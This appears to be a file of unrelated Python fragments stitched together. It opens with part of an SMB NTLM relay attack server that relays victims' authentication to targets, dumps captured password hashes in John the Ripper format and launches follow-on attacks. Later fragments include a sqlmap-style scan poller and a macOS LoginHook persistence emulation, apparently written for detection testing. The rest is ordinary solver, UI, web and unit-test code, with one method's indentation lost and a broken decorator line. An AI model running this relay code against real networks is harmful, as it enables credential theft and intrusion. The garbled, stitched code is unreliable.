                raise Exception(('Unknown NTLMSSP MessageType %d' % messageType))
            respParameters['SecurityBlobLength'] = len(respToken)
            respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
            respData['SecurityBlob'] = respToken.getData()
        else:
            # Standard security: plain LM/NTLM hashes inside the request.
            respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
            respData = smb.SMBSessionSetupAndXResponse_Data()
            sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
            sessionSetupData = smb.SMBSessionSetupAndX_Data()
            sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
            sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
            sessionSetupData.fromString(SMBCommand['Data'])
            client = connData['SMBClient']
            (_, errorCode) = client.sendStandardSecurityAuth(sessionSetupData)
            if (errorCode != STATUS_SUCCESS):
                packet = smb.NewSMBPacket()
                packet['Flags1'] = (smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS)
                packet['Flags2'] = (smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY)
                packet['Command'] = recvPacket['Command']
                packet['Pid'] = recvPacket['Pid']
                packet['Tid'] = recvPacket['Tid']
                packet['Mid'] = recvPacket['Mid']
                packet['Uid'] = recvPacket['Uid']
                packet['Data'] = b'\x00\x00\x00'
                packet['ErrorCode'] = (errorCode >> 16)
                packet['ErrorClass'] = (errorCode & 255)
                self.targetprocessor.logTarget(self.target)
                return (None, [packet], errorCode)
            else:
                self.authUser = ('%s/%s' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account'])).upper()
                LOG.info(('Authenticating against %s://%s as %s SUCCEED' % (self.target.scheme, self.target.netloc, self.authUser)))
                self.targetprocessor.logTarget(self.target, True, self.authUser)
                ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
                client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
                if (self.server.getJTRdumpPath() != ''):
                    writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
                connData['Authenticated'] = True
                if (not self.config.disableMulti):
                    del connData['relayToHost']
                self.do_attack(client)
        respData['NativeOS'] = smbServer.getServerOS()
        respData['NativeLanMan'] = smbServer.getServerOS()
        respSMBCommand['Parameters'] = respParameters
        respSMBCommand['Data'] = respData
        smbServer.setConnectionData(connId, connData)
        return ([respSMBCommand], None, errorCode)

    def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
        """On SMB1 TREE_CONNECT_ANDX in multi-relay mode, pick a target for this
        user and force re-authentication (session expired)."""
        connData = smbServer.getConnectionData(connId)
        authenticateMessage = connData['AUTHENTICATE_MESSAGE']
        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper()
        if self.config.disableMulti:
            # FIX: this previously called self.smbComTreeConnectAndX (itself),
            # recursing forever; the saved original hook must be used instead.
            return self.origsmbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket)
        try:
            if (self.config.mode.upper() == 'REFLECTION'):
                self.targetprocessor = TargetsProcessor(singleTarget=('SMB://%s:445/' % connData['ClientIP']))
            self.target = self.targetprocessor.getTarget(identity=self.authUser)
            if (self.target is None):
                # FIX: format string had '%%s' with a surplus argument tuple.
                LOG.info(('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' % (connId, self.authUser, connData['ClientIP'])))
                # FIX: the original SMB1 hook takes SMBCommand as well.
                return self.origsmbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket)
            # FIX: same '%%s' / argument-count mismatch as above.
            LOG.info(('SMBD-%s: Connection from %s@%s controlled, attacking target %s://%s' % (connId, self.authUser, connData['ClientIP'], self.target.scheme, self.target.netloc)))
            if (self.config.mode.upper() == 'REFLECTION'):
                LOG.debug('Downgrading to standard security')
                extSec = False
                # NOTE(review): '+= ~flag' is an odd way to clear a bit
                # ('&= ~flag' is the usual form) — confirm against upstream.
                recvPacket['Flags2'] += (~ smb.SMB.FLAGS2_EXTENDED_SECURITY)
            else:
                extSec = True
            client = self.init_client(extSec)
        except Exception as e:
            LOG.error(('Connection against target %s://%s FAILED: %s' % (self.target.scheme, self.target.netloc, str(e))))
            self.targetprocessor.logTarget(self.target)
        else:
            connData['relayToHost'] = True
            connData['Authenticated'] = False
            del connData['NEGOTIATE_MESSAGE']
            del connData['CHALLENGE_MESSAGE']
            del connData['AUTHENTICATE_MESSAGE']
            connData['SMBClient'] = client
            connData['EncryptionKey'] = client.getStandardSecurityChallenge()
            smbServer.setConnectionData(connId, connData)
        resp = smb.NewSMBPacket()
        resp['Flags1'] = smb.SMB.FLAGS1_REPLY
        resp['Flags2'] = (((smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS) | smb.SMB.FLAGS2_LONG_NAMES) | (recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE))
        resp['Tid'] = recvPacket['Tid']
        resp['Mid'] = recvPacket['Mid']
        resp['Pid'] = connData['Pid']
        respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
        respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
        respData = smb.SMBTreeConnectAndXResponse_Data()
        treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
        if (treeConnectAndXParameters['Flags'] & 8):
            respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
        treeConnectAndXData = smb.SMBTreeConnectAndX_Data(flags=recvPacket['Flags2'])
        treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
        treeConnectAndXData.fromString(SMBCommand['Data'])
        UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
        if ntpath.ismount(UNCOrShare):
            path = UNCOrShare.split('\\')[3]
        else:
            path = ntpath.basename(UNCOrShare)
        # Answer "session expired" so the client re-authenticates.
        errorCode = STATUS_NETWORK_SESSION_EXPIRED
        resp['ErrorCode'] = (errorCode >> 16)
        resp['_reserved'] = 3
        resp['ErrorClass'] = (errorCode & 255)
        if (path == 'IPC$'):
            respData['Service'] = 'IPC'
        else:
            respData['Service'] = path
        respData['PadLen'] = 0
        respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS')
        respSMBCommand['Parameters'] = respParameters
        respSMBCommand['Data'] = respData
        resp['Uid'] = connData['Uid']
        resp.addCommand(respSMBCommand)
        smbServer.setConnectionData(connId, connData)
        return (None, [resp], errorCode)

    def init_client(self, extSec):
        """Instantiate and connect the protocol client for the current target."""
        if (self.target.scheme.upper() in self.config.protocolClients):
            client = self.config.protocolClients[self.target.scheme.upper()](self.config, self.target, extendedSecurity=extSec)
            client.initConnection()
        else:
            raise Exception(('Protocol Client for %s not found!' % self.target.scheme))
        return client

    def do_ntlm_negotiate(self, client, token):
        """Forward an NTLM NEGOTIATE token to the target; return its challenge."""
        return client.sendNegotiate(token)

    def do_ntlm_auth(self, client, SPNEGO_token, challenge):
        """Forward the NTLM AUTHENTICATE blob; return (response, status code)."""
        (clientResponse, errorCode) = client.sendAuth(SPNEGO_token, challenge)
        return (clientResponse, errorCode)

    def do_attack(self, client):
        """Run the configured attack (or park the session on the SOCKS server)."""
        if (self.config.runSocks and (self.target.scheme.upper() in self.config.socksServer.supportedSchemes)):
            if (self.config.runSocks is True):
                # Hand the authenticated session to the SOCKS relay instead.
                activeConnections.put((self.target.hostname, client.targetPort, self.target.scheme.upper(), self.authUser, client, client.sessionData))
                return
        if (self.target.scheme.upper() in self.config.attacks):
            clientThread = self.config.attacks[self.target.scheme.upper()](self.config, client.session, self.authUser)
            clientThread.start()
        else:
            LOG.error(('No attack configured for %s' % self.target.scheme.upper()))

    def _start(self):
        self.server.daemon_threads = True
        self.server.serve_forever()
        LOG.info('Shutting down SMB Server')
        self.server.server_close()

    def run(self):
        LOG.info('Setting up SMB Server')
        self._start()
def _extract_args(*args, **kwargs):
    """Validate and unpack the arguments of a ``solve(lhs == rhs, u, ...)`` call.

    Returns the tuple (eq, u, bcs, J, Jp, M, form_compiler_parameters,
    solver_parameters, nullspace, transpose_nullspace, near_nullspace,
    options_prefix). Raises RuntimeError on unknown keywords or a non-Form
    goal functional, TypeError on a bad positional-argument count.
    """
    valid_kwargs = ['bcs', 'J', 'Jp', 'M', 'form_compiler_parameters',
                    'solver_parameters', 'nullspace', 'transpose_nullspace',
                    'near_nullspace', 'options_prefix', 'appctx']
    for kwarg in kwargs:
        if kwarg in valid_kwargs:
            continue
        raise RuntimeError(("Illegal keyword argument '%s'; valid keywords are %s" % (kwarg, ', '.join((("'%s'" % kwarg) for kwarg in valid_kwargs)))))
    if len(args) < 2:
        raise TypeError('Missing arguments, expecting solve(lhs == rhs, u, bcs=bcs), where bcs is optional')
    if len(args) > 3:
        raise TypeError('Too many arguments, expecting solve(lhs == rhs, u, bcs=bcs), where bcs is optional')
    eq, u = args[0], args[1]
    # Boundary conditions may come third positionally or as a keyword.
    bcs = _extract_bcs(args[2] if len(args) > 2 else kwargs.get('bcs'))
    J = kwargs.get('J')
    Jp = kwargs.get('Jp')
    M = kwargs.get('M')
    if M is not None and not isinstance(M, ufl.Form):
        raise RuntimeError('Expecting goal functional M to be a UFL Form')
    nullspace = kwargs.get('nullspace')
    nullspace_T = kwargs.get('transpose_nullspace')
    near_nullspace = kwargs.get('near_nullspace')
    form_compiler_parameters = kwargs.get('form_compiler_parameters', {})
    solver_parameters = kwargs.get('solver_parameters', {})
    options_prefix = kwargs.get('options_prefix')
    return (eq, u, bcs, J, Jp, M, form_compiler_parameters, solver_parameters,
            nullspace, nullspace_T, near_nullspace, options_prefix)
class DomSnackbar(JsHtml.JsHtmlRich):
    """JavaScript DOM bindings for a snackbar component.

    Each method returns a JavaScript fragment addressing the underlying widget
    registered on ``window`` under the component's htmlCode.
    """

    def isOpen(self) -> JsObjects.JsBoolean.JsBoolean:
        """Return a JS boolean expression reporting whether the snackbar is open."""
        return JsObjects.JsBoolean.JsBoolean.get(("window['%s'].isOpen()" % self.component.htmlCode))

    def open(self) -> JsUtils.jsWrap:
        """Return the JS statement opening the snackbar."""
        return JsUtils.jsWrap(("window['%s'].open()" % self.component.htmlCode))

    def close(self, reason: str=None):
        """Return the JS statement closing the snackbar.

        :param reason: Optional close reason, converted and forwarded to the
            JS ``close`` call when provided.
        """
        if (reason is None):
            return JsUtils.jsWrap(("window['%s'].close()" % self.component.htmlCode))
        reason = JsUtils.jsConvertData(reason, None)
        return JsUtils.jsWrap(("window['%s'].close(%s)" % (self.component.htmlCode, reason)))
def getOptParser(doc=''):
    """Build the optparse parser for the test runner command line.

    :param doc: extra usage text appended after the standard usage line.
    :return: a configured ``optparse.OptionParser``.
    """
    Option = optparse.Option
    usage = ('%s [OPTIONS] [regexps]\n' % sys.argv[0]) + doc
    parser = optparse.OptionParser(usage=usage, version=('%prog ' + version))
    options = [
        Option('-l', '--log-level', dest='log_level', default=None,
               help='Log level for the logger to use during running tests'),
        Option('-v', action='count', dest='verbosity', default=None,
               help='Increase verbosity'),
        Option('--verbosity', action='store', dest='verbosity', type=int, default=None,
               help='Set numerical level of verbosity (0..4)'),
        Option('--log-direct', action='store_false', dest='log_lazy', default=True,
               help='Prevent lazy logging inside tests'),
        Option('-n', '--no-network', action='store_true', dest='no_network',
               help='Do not run tests that require the network'),
        Option('-m', '--memory-db', action='store_true', dest='memory_db',
               help='Run database tests using memory instead of file'),
        Option('-f', '--fast', action='store_true', dest='fast',
               help='Try to increase speed of the tests, decreasing of wait intervals, memory database'),
        Option('-i', '--ignore', action='store_true', dest='negate_re',
               help='negate [regexps] filter to ignore tests matched specified regexps'),
        Option('-t', '--log-traceback', action='store_true',
               help='Enrich log-messages with compressed tracebacks'),
        Option('--full-traceback', action='store_true',
               help='Either to make the tracebacks full, not compressed (as by default)'),
    ]
    parser.add_options(options)
    return parser
def scan_status(task_id):
    """Poll the scan-status endpoint until the scan terminates.

    Checks every 10 seconds; once the reported status is 'terminated',
    fetches and returns the scan data for ``task_id``.
    """
    status_url = base_url + '/scan/' + task_id + '/status'
    while True:
        resp = req.api_request(status_url, 'GET', api_header)
        if json.loads(resp.text)['status'] == 'terminated':
            return show_scan_data(task_id)
        time.sleep(10)
# NOTE(review): this bare call looks like a decorator whose leading '@' was
# lost (presumably something like ``@common.requires_os(*metadata.platforms)``
# guarding ``main``); as written it executes at import time — confirm against
# the original source.
_os(*metadata.platforms)
def main():
    """Mimic installing a macOS LoginHook via a fake ``defaults`` binary."""
    masquerade = '/tmp/defaults'
    # Copy a benign binary to /tmp/defaults so the executed path looks real.
    common.create_macos_masquerade(masquerade)
    common.log('Launching fake defaults command to mimic installing a login hook.')
    # Run the masqueraded binary with LoginHook write arguments, then clean up.
    common.execute([masquerade, 'write', 'LoginHook'], timeout=10, kill=True)
    common.remove_file(masquerade)
class OptionPlotoptionsSankeyTooltipDatetimelabelformats(Options):
    """Datetime label formats used by sankey tooltips.

    NOTE(review): each getter/setter pair here was written as two plain
    methods with the same name, so the second definition silently shadowed
    the first and the getters were unreachable (and calling e.g. ``obj.day()``
    hit the setter and raised TypeError). Restored the ``@property`` /
    ``@<name>.setter`` pairing that this layout clearly intends — the usual
    pattern for ``_config_get`` / ``_config`` option wrappers.
    """

    @property
    def day(self):
        return self._config_get('%A, %e %b %Y')

    @day.setter
    def day(self, text: str):
        self._config(text, js_type=False)

    @property
    def hour(self):
        return self._config_get('%A, %e %b, %H:%M')

    @hour.setter
    def hour(self, text: str):
        self._config(text, js_type=False)

    @property
    def millisecond(self):
        return self._config_get('%A, %e %b, %H:%M:%S.%L')

    @millisecond.setter
    def millisecond(self, text: str):
        self._config(text, js_type=False)

    @property
    def minute(self):
        return self._config_get('%A, %e %b, %H:%M')

    @minute.setter
    def minute(self, text: str):
        self._config(text, js_type=False)

    @property
    def month(self):
        return self._config_get('%B %Y')

    @month.setter
    def month(self, text: str):
        self._config(text, js_type=False)

    @property
    def second(self):
        return self._config_get('%A, %e %b, %H:%M:%S')

    @second.setter
    def second(self, text: str):
        self._config(text, js_type=False)

    @property
    def week(self):
        return self._config_get('Week from %A, %e %b %Y')

    @week.setter
    def week(self, text: str):
        self._config(text, js_type=False)

    @property
    def year(self):
        return self._config_get('%Y')

    @year.setter
    def year(self, text: str):
        self._config(text, js_type=False)
class TestVersionLockSchema(unittest.TestCase):
    """Schema validation tests for the version-lock file format."""

    @classmethod
    def setUpClass(cls):
        # NOTE(review): ``setUpClass`` receives ``cls`` and must be a
        # classmethod; without the decorator unittest calls it unbound and
        # fails. Restored @classmethod (it appears to have been stripped).
        cls.version_lock_contents = {'33f306e8-417c-411b-965c-c2812d6d3f4d': {'rule_name': 'Remote File Download via PowerShell', 'sha256': '8679cd72bf85b67dde3dcfdaba749ed1fa6560bca5efd03ed41c76a500ce31d6', 'type': 'eql', 'version': 4}, '34fde489-94b0-4500-a76f-b8a157cf9269': {'min_stack_version': '8.2', 'previous': {'7.13': {'rule_name': 'Telnet Port Activity', 'sha256': '3dd4a438c915920e6ddb0a5212603af5d94fb8a6b51a32f223d930d7e3becb89', 'type': 'query', 'version': 9}}, 'rule_name': 'Telnet Port Activity', 'sha256': 'b0bdfafb83eadc0303ad1801e0707743f96a36209aa58228d3bf6a89', 'type': 'query', 'version': 10}}

    def test_version_lock_no_previous(self):
        """A well-formed lock (single-level ``previous``) validates cleanly."""
        version_lock_contents = copy.deepcopy(self.version_lock_contents)
        VersionLockFile.from_dict(dict(data=version_lock_contents))

    def test_version_lock_has_nested_previous(self):
        """Nesting ``previous`` inside ``previous`` must fail validation."""
        version_lock_contents = copy.deepcopy(self.version_lock_contents)
        with self.assertRaises(ValidationError):
            previous = version_lock_contents['34fde489-94b0-4500-a76f-b8a157cf9269']['previous']
            version_lock_contents['34fde489-94b0-4500-a76f-b8a157cf9269']['previous']['previous'] = previous
            VersionLockFile.from_dict(dict(data=version_lock_contents))
def extractLittleducktlWordpressCom(item):
    """Parse a littleducktl.wordpress.com posting into a release message.

    Returns None for non-chapter or preview posts, a release message when a
    known tag matches, and False otherwise.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    is_preview = 'preview' in item['title'].lower()
    if (not (chp or vol)) or is_preview:
        return None
    for (tagname, name, tl_type) in (('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')):
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
# NOTE(review): the leading '@' of this route decorator appears to have been
# stripped; restored so the view is actually registered.
@_page.route('/table/delete_config', methods=['POST'])
def table_delete_config():
    """Delete a saved log-config file named in the request.

    Refuses to delete the config currently in use. Always returns a JSON
    status payload.
    """
    res = check_uuid(all_data['uuid'], request.json['uuid'])
    if res is not None:
        return jsonify(res)
    if 'config_name' not in request.json:
        return jsonify(status='fail', msg='There is no config_name in your request.')
    if request.json['config_name'] == all_data['log_config_name']:
        # The active config must not be removed.
        return jsonify(status='fail', msg='Cannot delete config being used.')
    log_dir = all_data['root_log_dir']
    path = os.path.join(log_dir, request.json['config_name'])
    if os.path.isfile(path):
        try:
            os.remove(path)
        except Exception:
            print('Error occurs when delete config:{}.'.format(request.json['config_name']))
            traceback.print_exc()
            return jsonify(status='fail', msg='Error happens when delete.')
        return jsonify(status='success')
    # BUG FIX: the original fell through here without ``return``, so the view
    # returned None when the file was already gone. Deleting a missing file
    # is treated as success.
    return jsonify(status='success')
class BuildTimedelta(PropertyPreprocessor):
    """Preprocessor that converts a numeric argument into a ``datetime.timedelta``."""
    type = 'to_timedelta'
    properties_schema_cls = BuildTimedeltaSchema

    def imports(self):
        """Modules the generated code needs for this preprocessor."""
        return {'modules': ['datetime']}

    def process_arg(self, arg, node, raw_args):
        """Convert ``arg`` into a timedelta using the configured ``units``.

        Returns None when ``arg`` is None. Raises Exception (naming the
        preprocessor and the offending argument) when ``arg`` is not a valid
        duration value for ``datetime.timedelta``.
        """
        if arg is None:
            return None
        try:
            # ``units`` (e.g. 'seconds', 'days') selects the timedelta keyword.
            return datetime.timedelta(**{self.properties['units']: arg})
        except TypeError as e:
            # FIX: chain the original TypeError so debugging keeps the cause.
            raise Exception('Error in preprocessor {} for argument `{}`: {}'.format(self.type, arg, str(e))) from e
class CoprFormFactory(object):
    """Factory building project (copr) form classes bound to a user/group/copr."""

    @staticmethod
    def create_form_cls(user=None, group=None, copr=None):
        """Return a CoprForm subclass whose validators are bound to the given
        user/group and, when editing, to the existing ``copr`` project.

        NOTE(review): the method takes no ``self``; without @staticmethod an
        instance call would pass the instance as ``user``. Restored the
        decorator (it appears to have been stripped); class-level calls keep
        working unchanged.
        """
        class F(CoprForm):
            id = wtforms.HiddenField()
            group_id = wtforms.HiddenField()
            name = wtforms.StringField('Name', validators=[wtforms.validators.DataRequired(), NameCharactersValidator(), CoprUniqueNameValidator(user=user, group=group), NameNotNumberValidator()])
            persistent = wtforms.BooleanField('Protect project and its builds against deletion', description="Project's builds and the project itself\n cannot be deleted by any means. This option is set once and\n for all (this option can not be changed after project is\n created).", render_kw={'disabled': bool(copr)}, default=False, false_values=FALSE_VALUES)
            delete_after_days = wtforms.IntegerField('Delete after days', validators=[wtforms.validators.Optional(), wtforms.validators.NumberRange(min=0, max=60)], render_kw={'disabled': bool((copr and copr.persistent))})
            chroots = ChrootsField(copr=copr)

            def selected_chroots(self):
                """Currently selected chroot names."""
                return self.chroots.data

            def validate(self, extra_validators=None):
                """Standard WTForms validation plus cross-field rules."""
                if not super(F, self).validate(extra_validators=extra_validators):
                    return False
                if not self.validate_mock_chroots_not_empty():
                    self.form_errors = ['At least one chroot must be selected']
                    return False
                # Auto-deletion contradicts a deletion-protected project.
                if self.persistent.data and self.delete_after_days.data:
                    self.delete_after_days.errors.append("'delete after' can not be combined with persistent")
                    return False
                return True

            def validate_mock_chroots_not_empty(self):
                """True when at least one chroot is selected."""
                return bool(self.chroots.data)
        return F
class TestSeq2Pat(unittest.TestCase):
    # Directory of this test file, and the sibling ``data`` directory holding
    # the input/expected-result fixtures read by the tests below.
    TEST_DIR = os.path.dirname(os.path.abspath(__file__))
    DATA_DIR = (((TEST_DIR + os.sep) + 'data') + os.sep)
    def test_example(self):
        """End-to-end example: mine, add an average constraint, mine, remove it, mine again."""
        seq2pat = Seq2Pat(sequences=[['A', 'C', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        patterns = seq2pat.get_patterns(min_frequency=2)
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        # NOTE(review): ``timestamp`` is built but never used in this test.
        timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
        avg_constraint = (3 <= price.average() <= 5)
        seq2pat.add_constraint(avg_constraint)
        # Constrained mining: only patterns satisfying the average filter remain.
        patterns = seq2pat.get_patterns(min_frequency=2)
        self.assertListEqual([['A', 'C', 2], ['A', 'D', 2], ['C', 'A', 'D', 2]], patterns)
        seq2pat.remove_constraint(avg_constraint)
        # Unconstrained mining again: the full pattern set returns.
        patterns = seq2pat.get_patterns(min_frequency=2)
        self.assertListEqual([['C', 'A', 3], ['A', 'C', 2], ['A', 'C', 'D', 2], ['A', 'D', 2], ['B', 'A', 2], ['C', 'A', 'D', 2], ['C', 'B', 2], ['C', 'B', 'A', 2], ['C', 'D', 2]], patterns)
    def test_usage_example_average(self):
        """Average-price constraint in [3, 4] narrows results to ['A', 'D']."""
        seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        # NOTE(review): ``timestamp`` is built but never used in this test.
        timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
        avg_constraint = seq2pat.add_constraint((3 <= price.average() <= 4))
        patterns = seq2pat.get_patterns(min_frequency=2)
        self.assertListEqual([['A', 'D', 2]], patterns)
    def test_usage_example_gap(self):
        """Gap-price constraint in [4, 6] narrows results to ['A', 'D']."""
        seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        price = Attribute(values=[[5, 5, 3, 2, 8], [1, 3, 3], [4, 1, 2, 5]])
        # NOTE(review): ``timestamp`` is built but never used in this test.
        timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
        gap_constraint = seq2pat.add_constraint((4 <= price.gap() <= 6))
        patterns = seq2pat.get_patterns(min_frequency=2)
        self.assertListEqual([['A', 'D', 2]], patterns)
    def test_usage_example_span(self):
        """Timestamp-span constraint in [0, 2] keeps ['A', 'D'] and ['B', 'A']."""
        seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        # NOTE(review): ``price`` is built but never used in this test.
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
        span_constraint = seq2pat.add_constraint((0 <= timestamp.span() <= 2))
        patterns = seq2pat.get_patterns(min_frequency=2)
        self.assertListEqual([['A', 'D', 2], ['B', 'A', 2]], sorted(patterns))
    def test_usage_example_median(self):
        """Median-price constraint in [3, 4] narrows results to ['A', 'D']."""
        seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        # NOTE(review): ``timestamp`` is built but never used in this test.
        timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
        med_constraint = seq2pat.add_constraint((3 <= price.median() <= 4))
        patterns = seq2pat.get_patterns(min_frequency=2)
        self.assertListEqual([['A', 'D', 2]], patterns)
    def test_quick_start_int(self):
        """Quick-start example over integer items with a lower-bound-only gap constraint."""
        seq2pat = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        seq2pat.add_constraint(((- 6) <= price.gap()))
        patterns = seq2pat.get_patterns(min_frequency=2)
        self.assertListEqual([[1, 4, 2], [2, 1, 2], [3, 1, 2]], patterns)
def test_quick_start(self):
seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
seq2pat.add_constraint(((- 6) <= price.gap() <= (- 1)))
patterns = seq2pat.get_patterns(min_frequency=2)
self.assertListEqual([['A', 'D', 2]], patterns)
    def test_usage_lb_ub(self):
        """Constraints built with both bounds expose lower_bound and upper_bound; add/remove round-trips."""
        sequences = [[1, 2, 3], [4, 5], [1, 3, 6, 7]]
        seq2pat = Seq2Pat(sequences)
        attributes = [[10, 20, 30], [40, 50], [10, 30, 60, 70]]
        att1 = Attribute(attributes)
        att2 = Attribute(attributes)
        gap_constraint = (0 <= att1.gap() <= 10)
        seq2pat.add_constraint(gap_constraint)
        avg_constraint = seq2pat.add_constraint((20 <= att1.average() <= 30))
        median_constraint = seq2pat.add_constraint(((- 1) <= att1.median() <= 1000))
        span_constraint = seq2pat.add_constraint((0 <= att1.span() <= 900))
        span_constraint2 = seq2pat.add_constraint(((- 10) <= att2.span() <= 5))
        self.assertEqual(gap_constraint.lower_bound, 0)
        self.assertEqual(avg_constraint.lower_bound, 20)
        self.assertEqual(median_constraint.lower_bound, (- 1))
        self.assertEqual(span_constraint.lower_bound, 0)
        self.assertEqual(span_constraint2.lower_bound, (- 10))
        self.assertEqual(gap_constraint.upper_bound, 10)
        self.assertEqual(avg_constraint.upper_bound, 30)
        self.assertEqual(median_constraint.upper_bound, 1000)
        self.assertEqual(span_constraint.upper_bound, 900)
        self.assertEqual(span_constraint2.upper_bound, 5)
        # Removing and re-adding constraints must not raise.
        seq2pat.remove_constraint(gap_constraint)
        seq2pat.remove_constraint(avg_constraint)
        seq2pat.remove_constraint(median_constraint)
        seq2pat.remove_constraint(span_constraint)
        seq2pat.add_constraint(gap_constraint)
        seq2pat.add_constraint(span_constraint)
    def test_usage_lb(self):
        """Lower-bound-only constraints expose lower_bound; add/remove round-trips."""
        sequences = [[1, 2, 3], [4, 5], [1, 3, 6, 7]]
        seq2pat = Seq2Pat(sequences)
        attributes = [[10, 20, 30], [40, 50], [10, 30, 60, 70]]
        att1 = Attribute(attributes)
        att2 = Attribute(attributes)
        gap_constraint = (0 <= att1.gap())
        seq2pat.add_constraint(gap_constraint)
        avg_constraint = seq2pat.add_constraint((20 <= att1.average()))
        median_constraint = seq2pat.add_constraint(((- 1) <= att1.median()))
        span_constraint = seq2pat.add_constraint((0 <= att1.span()))
        span_constraint2 = seq2pat.add_constraint(((- 10) <= att2.span()))
        self.assertEqual(gap_constraint.lower_bound, 0)
        self.assertEqual(avg_constraint.lower_bound, 20)
        self.assertEqual(median_constraint.lower_bound, (- 1))
        self.assertEqual(span_constraint.lower_bound, 0)
        self.assertEqual(span_constraint2.lower_bound, (- 10))
        # Removing and re-adding constraints must not raise.
        seq2pat.remove_constraint(gap_constraint)
        seq2pat.remove_constraint(avg_constraint)
        seq2pat.remove_constraint(median_constraint)
        seq2pat.remove_constraint(span_constraint)
        seq2pat.add_constraint(gap_constraint)
        seq2pat.add_constraint(span_constraint)
    def test_usage(self):
        """Mining the file-based fixture with four attribute constraints must not raise."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        attribute_file = (self.DATA_DIR + 'input_att1.txt')
        attribute_1 = read_data(attribute_file)
        seq2pat = Seq2Pat(sequences, max_span=None)
        att1 = Attribute(attribute_1)
        avg_constraint = seq2pat.add_constraint((5 <= att1.average()))
        gap_constraint = seq2pat.add_constraint((att1.gap() <= 10))
        median_constraint = seq2pat.add_constraint((10 <= att1.median() <= 15))
        span_constraint = seq2pat.add_constraint((att1.span() <= 20))
        seq2pat.get_patterns(min_frequency=100)
    def test_from_mpp(self):
        """min_frequency equal to the number of sequences yields no pattern here."""
        seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        # NOTE(review): ``time`` and ``price`` are built but never used here.
        time = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        patterns = seq2pat.get_patterns(min_frequency=3)
        self.assertListEqual([], patterns)
    def test_bounds_with_minus_1(self):
        """Negative bounds on a gap constraint are handled correctly."""
        seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        # NOTE(review): ``timestamp`` is built but never used in this test.
        timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
